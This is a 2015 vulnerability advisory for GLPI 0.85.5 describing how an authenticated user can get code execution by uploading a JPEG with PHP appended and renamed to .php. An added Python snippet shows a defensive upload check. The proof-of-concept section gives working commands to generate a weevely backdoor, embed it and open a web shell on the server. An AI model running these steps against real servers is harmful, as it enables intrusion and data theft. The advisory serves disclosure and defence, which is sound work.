# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
# Date: September 7th, 2015
# Exploit Author: Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI 0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3


I. INTRODUCTION
========================================================================

GLPI is the Information Resource-Manager with an additional
Administration-Interface. You can use it to build up a database with an
inventory for your company (computers, software, printers...). It has
enhanced functions to make the daily life of administrators easier,
like a job-tracking system with mail notification and methods to build a
database with basic information about your network topology.


II. DESCRIPTION
========================================================================

The application allows users to update their own profile, including
uploading a new photo as an attachment.

The uploaded photo is stored in "GLPI_ROOT/files/_pictures/".

This file, for example named "photo.jpeg", is directly accessible at
"http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX" is an ID
automatically generated by the system and visible in the HTML source
code.

Besides, the server does not check the extension of the uploaded file,
but only the first bytes of its content (the magic bytes), which
indicate the file type.

Exploiting this flaw, an attacker may upload a tampered jpeg file that
contains php code placed at the end of the file, so that, just by changing
the file extension to ".php", the php code will be interpreted by default!

To trigger this vulnerability it is necessary to have an account.

This vulnerability is a combination of two issues:
- predictable uploaded file names and path
- upload of any kind of file, not limited to images


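Added defensive example (not part of this advisory and not GLPI code): a Python upload check that closes both issues listed above. It requires the extension to match the sniffed image type, requires a JPEG to end exactly at its EOI marker (so appended code is rejected), scans the whole body for a PHP open tag (code can also sit in a comment segment), and stores the file under an unpredictable name whose extension comes from the sniffed type. The allowed-type policy and the sample bytes are constructed for the example, not real photos.

```python
import re
import secrets

# Allowed image types and the magic bytes each must start with (assumed policy).
MAGIC = {"jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
# PHP open tags: "<?php", "<?=" and the short "<? ". "<?xpacket" (XMP metadata) is left alone.
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)


def sniff_type(data):
    """Return the image type whose magic bytes open `data`, or None."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename, data):
    """Return (ok, detail): detail is the sniffed type on success, else the reason."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in EXT_TO_TYPE:
        return False, "extension not allowed"
    kind = sniff_type(data)
    if kind != EXT_TO_TYPE[ext]:
        return False, "content does not match extension"
    # A JPEG must end exactly at its EOI marker; anything appended after it fails here.
    if kind == "jpeg" and not data.endswith(b"\xff\xd9"):
        return False, "trailing data after JPEG EOI marker"
    # Code can also hide inside a COM/APP segment, so scan the whole body.
    if PHP_TAG.search(data):
        return False, "PHP open tag found in image data"
    return True, kind


def storage_name(kind):
    """Unpredictable file name; the extension comes from the sniffed type, never the user."""
    return f"{secrets.token_hex(16)}.{kind}"


# Constructed samples (not real photos): a minimal JPEG skeleton of SOI, empty APP0, EOI;
# the same bytes with a PHP tag appended after EOI; and one carrying the tag in a COM segment.
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x02\xff\xd9"
APPENDED = CLEAN_JPEG + b"<?php /* appended after EOI */ ?>"
COMMENT = b"\xff\xd8\xff\xfe\x00\x07<?php\xff\xd9"
```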
III. PROOF OF CONCEPT
========================================================================

Generate backdoor:

user@backbox:~$ weevely generate pass123 /tmp/bd.php
user@backbox:~$ file /tmp/photo.jpeg
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php

Upload the new tampered photo in GLPI > Settings

Open a terminal on the target:

user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123


IV. BUSINESS IMPACT
========================================================================

By uploading an interpretable php file, an attacker may be able to
execute arbitrary code on the server.

This flaw may compromise the integrity of the system and/or expose
sensitive information.


V. SYSTEMS AFFECTED
========================================================================

GLPI Version 0.85.5 is vulnerable (probably all previous versions)


VI. VULNERABILITY HISTORY
========================================================================

September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification


VII. LEGAL NOTICES
========================================================================

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.